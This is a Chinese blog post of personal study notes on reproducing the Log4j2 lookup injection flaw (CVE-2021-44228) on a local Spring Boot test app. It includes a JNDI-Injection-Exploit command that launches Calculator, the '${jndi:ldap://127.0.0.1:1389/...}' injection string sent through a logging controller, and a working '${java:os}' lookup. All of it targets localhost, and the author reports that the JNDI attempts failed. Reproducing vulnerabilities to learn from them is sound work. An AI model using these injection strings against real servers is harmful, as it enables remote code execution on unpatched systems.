【log4j2】lookup注入漏洞

最新推荐文章于 2022-12-13 13:15:53 发布
最新推荐文章于 2022-12-13 13:15:53 发布
阅读量3.3k 收藏
点赞数 1
分类专栏: Java Springboot 文章标签: java 安全 spring boot
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011279583/article/details/121951162
版权

学习了一下最近曝出的log4j2漏洞(CVE-2021-44228),随便写个笔记,不求甚解。

参考资料:
https://itsc.nju.edu.cn/7a/42/c41947a555586/page.htm
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_8748923582296814965%22%7D&n_type=1&p_from=4
https://baijiahao.baidu.com/s?id=1718946520876495065&wfr=spider&for=pc

环境:
参考:
https://www.cnblogs.com/keeya/p/10101547.html

由于既存项目采用spring-boot默认的logback,复现漏洞需要引入log4j2的依赖:
原pom.xml:

    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.0.3.RELEASE</version>
        <relativePath />
    </parent>

	<dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-web</artifactId>
    </dependency>

修改后的pom.xml:

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
            <exclusions>
                <exclusion>
                    <groupId>org.springframework.boot</groupId>
                    <artifactId>spring-boot-starter-logging</artifactId>
                </exclusion>
            </exclusions>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-log4j2</artifactId>
        </dependency>

先说结论:
既存项目采用spring-boot默认的logback,虽然maven依赖有以下两个jar包,但并不受此次漏洞影响,经测试,log里能够输出"${jndi:ldap://127.0.0.1:1389/1qjuex}"字符串。

log4j-to-slf4j-2.10.0.jar
log4j-api-2.10.0.jar

浅显地了解了几种复现的方法,本文记录的是学习过程中,尝试过的几个方法。
1.marshalsec 可能需要搭ldap环境,而且class文件需要自己编译,遂放弃;
2.借用工具 JNDI-Injection-Exploit,抛异常,未能成功调出计算器,应该是官方有修复;
3.没用jndi注入,而是采用"${java:os}",成功。

实现过程:
1.marshalsec(未实现)
参考:
http://www.hackdig.com/12/hack-559266.htm

2.JNDI-Injection-Exploit(未实现)
执行下面第3步的时候后台报错,结果不完整,未能调出计算器。
参考:
https://www.cnblogs.com/Welk1n/p/11701401.html
https://github.com/welk1n/JNDI-Injection-Exploit

实现过程:
1)下载jar包
https://github.com/welk1n/JNDI-Injection-Exploit/releases
2)打开cmd,进入jar包所在目录,执行以下命令:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"

取得图中内容:
在这里插入图片描述
3)执行以下代码(后台报错)

    public static void main(String[] args) throws Exception {
        InitialContext ctx = new InitialContext();
        ctx.lookup("ldap://127.0.0.1:1389/1qjuex");
    }

4)在项目中添加以下处理,并通过浏览器向这个controller发请求

    @RequestMapping("/log4jtest")
    public String log4jtest() {

        Logger logger = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME);
        logger.error("TEST: {}", "${jndi:ldap://127.0.0.1:1389/1qjuex}");
        return "index";
    }

同样抛异常,但看后台打印的log,没输出"${jndi:ldap://127.0.0.1:1389/1qjuex}"这个字符串,应该是识别了jndi的指令。

3.采用"${java:os}"
在项目中添加以下处理,并通过浏览器向这个controller发请求,log成功输出相关信息

    @RequestMapping("/log4jtest")
    public String log4jtest() {

        Logger logger = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME);
        logger.error("TEST:{}", "${java:os}");
        return "index";
    }

参考:
https://blog.csdn.net/lumingzhu111/article/details/121871114

懵a呆
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
我鮳,Log4j2突发重大漏洞,我们也中招了。。
沉默王二
12-12 3万+
长话短说吧。 相信大家已经被 Log4j2 的重大漏洞刷屏了,估计有不少小伙伴此前为了修 bug 已经累趴下了。很不幸,我的小老弟小二的 Spring Boot 项目中恰好用的就是 Log4j2,版本特喵的还是 2.14.1,在这次漏洞波及的版本范围之内。 第一时间从网上得知这个漏洞的消息后,小二吓尿了。赶紧跑过来问老王怎么解决。 老王先是给小二提供了一些临时性的建议,比如说: JVM 参数添加 -Dlog4j2.formatMsgNoLookups=true log4j2.formatMsgNoLooku
log4j2漏洞
thinker
12-12 5244
这个漏洞到底是怎么回事? 怎么利用这个漏洞呢? 我看了很多技术分析文章,都太过专业,很多非Java技术栈或者不搞安全的人只能看个一知半解,导致大家只能看个热闹,对这个漏洞的成因、原理、利用方式、影响面理解的不到位。 这篇文章,我尝试让所有技术相关的朋友都能看懂:这个注定会载入网络安全史册上的漏洞,到底是怎么一回事! log4j2 不管是什么编程语言,不管是前端后端还是客户端,对打日志都不会陌生。 通过日志,可以帮助我们了解程序的运行情况,排查程序运行中出现的问题。 在Java技术栈中,用的比较
Apache Log4j2 Lookup 代码执行与拒绝服务漏洞(CVE-2021-45046)
最新发布
weixin_44047654的博客
12-13 1713
Apache Log4j2 Lookup 代码执行与拒绝服务漏洞(CVE-2021-45046)
风靡IT圈的史诗级漏洞log4j2的产生原理及复现
肝铁侠的博客
12-12 8628
文章目录前言环境准备攻击代码准备一、攻击服务准备二、攻击代码准备三、修改本地项目业务代码攻击效果展示项目日志打印结语 前言 注:本文仅供参考学习,不构成任何犯罪引导 相信就在最近两天,不少IT圈的都在因为Log4j2,忙前忙后排查项目吧? 写JAVA的都知道,Log4j是用来记录日志的,它的覆盖率之广以至于此次受影响的范围可以说是核弹级别的影响了。 这个漏洞其实是取决于Log4j的一种Lookup机制,就是当我们做日志输出,出现占位符的时候,通过一些特殊的命令符号,可以执行一些程序代码。 接下来我们就来复
spring boot极速修复log4j漏洞
小马的专栏
12-13 1691
周末的log4j漏洞像一个炸弹扔进了粪坑一样,把各种码畜炸的七零八落,一身臭味。漏洞原因想必大家都已经知道了,我的项目使用spring boot也不幸中招。 出现了2个带log4j名称的引用,即使我没有用过log4j,这是spring boot start logging自己引用的,根据我查询的资料,只是一个适配层的转换,我项目里实际使用的是slf4j,而且我也没有引用log4j-core这个包,理论上来说是不会有漏洞的。 但是永远伟大正确的甲方爸爸说了,我不管,我看见log4j就害怕,看见后边是2
log4j log4j2 2.15.0漏洞解决
12-10
Log4j2中的JNDI(Java Naming and Directory Interface)注入漏洞,源于其对用户输入的日志字符串未进行充分的过滤和转义。攻击者可以通过在日志消息中插入特定格式的字符串,触发JNDI查找,进而执行任意代码,实现...
LOG4J RCE 漏洞分享与自查.pdf
12-15
Log4j RCE 漏洞是由于 Log4j2 2.10.0 版本中的 Lookup 模块存在的漏洞Lookup 模块允许用户在日志格式字符串中插入变量,从而实现了日志的动态格式化。但是,这个模块也提供了 JNDI lookup 功能,允许攻击者在日志...
log4j2_rce 项目
02-23
然而,2021年,研究人员发现了一个严重的漏洞,被称为“Log4Shell”,它源于Log4j2中的JNDI(Java Naming and Directory Interface)注入。这个漏洞允许攻击者通过操纵日志记录消息来执行任意远程代码,从而对受影响...
扫描log4j2 版本扫描log4j2 版本
12-16
2021年,Log4j2曝出了一次重大安全事件,被称为"CVE-2021-44228",这个漏洞允许攻击者通过注入特定的JNDI(Java Naming and Directory Interface)链接来执行任意代码。这个漏洞影响了大量使用Log4j2的系统,包括...
log4j-2.18.0
08-04
Log4Shell漏洞的核心在于log4j2Lookup功能,该功能允许在日志消息中动态解析变量。攻击者可以利用此功能,将恶意的JNDI链接注入到日志记录中,当log4j2尝试解析这些链接时,就会执行攻击者控制的代码。由于很多...
log4j-to-slf4j-2.10.0.jar
05-28
Log4j 2 API和SLF4J之间的Apache Log4j绑定。 org.apache.logging.log4j/log4j-to-slf4j/2.10.0/log4j-to-slf4j-2.10.0.jar
log4j-to-slf4j-2.11.2.jar
01-08
log4j-to-slf4j-2.11.2.jar
Apache Log4j2 远程代码执行漏洞处理
热门推荐
爱码少年 00fly.online 的博客
12-10 1万+
漏洞详情 Apache Log4j2是Apache的一个开源项目,它允许开发者以任意间隔输出日志信息;可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等。 该漏洞是由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。 风险等级 严重 影响范围 Lo
log4j 漏洞
系统看你学习很认真,随机送了一个月会员!
12-13 4803
突发!Log4j 爆“核弹级”漏洞,Flink、Kafka等至少十多个项目受影响 Apache Log4j远程代码执行漏洞 | 二次安全通告
Log4j2研究之lookup
夫礼者的专栏
08-25 1万+
一个称得上优秀的框架,必备的要素之一可以通过某种约定的格式读取到所运行环境中的配置信息。本文中我们就来感受下log4j2实现此项功能时的精妙设计。
解决项目中log4j版本漏洞
weixin_43573186的博客
12-29 4024
解决项目中log4j版本漏洞 前言:作为程序员应该都知道最近log4j出现的漏洞问题,讲一讲我所在的公司,其实领导在log4j被爆出存在漏洞的当天就在群里说了这个事,并且让我们把自己负责的系统都检查一遍,有使用到log4j存在漏洞的版本都要进行更新(因为有些版本还没爆出存在安全问题),但是当时都没什么人去注意,结果直到上周末,我们组负责的一个缴费系统出现不能缴费的情况,才发现是中了病毒。然后领导们开始极度重视,专门安排人监督我们来更新log4j版本。 废话不多说了,讲一下我负责的系统更新方式: 首先,一般
最新log4j2 远程代码执行漏洞(紧急扩散)
猿小白的博客
12-10 6440
一、问题描述 在12月9日晚间出现了Apache Log4j2 远程代码执行漏洞攻击代码。该漏洞利用无需特殊配置,经多方验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。Apache Log4j2是一款流行的Java日志框架,建议广大交易所、钱包、DeFi项目方抓紧自查是否受漏洞影响,并尽快升级新版本。 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被..
Log4j2+Slf4j快速入门
奋斗、
04-10 5711
前言         本文目的在于让RD快速掌握Log4j2+Slf4j在Java Web项目中的使用。         注意:该方法对Servlet3.0+适用,Servlet2.5以前的版本还需额外的步骤,详见:Servlet-2.5。 Maven依赖     org.apache.logging.log4j     l
log4j升级log4j2遇到的问题,及解决办法
三千炼心的博客
12-27 5825
一、导入包 <!-- log --> <dependency> <groupId>org.slf4j</groupId> <artifactId>slf4j-api</artifactId> <version>${slf4j.version}</version> &...
Apache Log4j2用户指南
- 开发者可以扩展Log4j 2,实现自己的Appender、Filter、Lookup等功能,满足特定需求。 17. **程序化配置** - 除了使用配置文件,Log4j 2还支持在代码中动态创建和修改配置,增加了灵活性。 18. **自定义日志...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值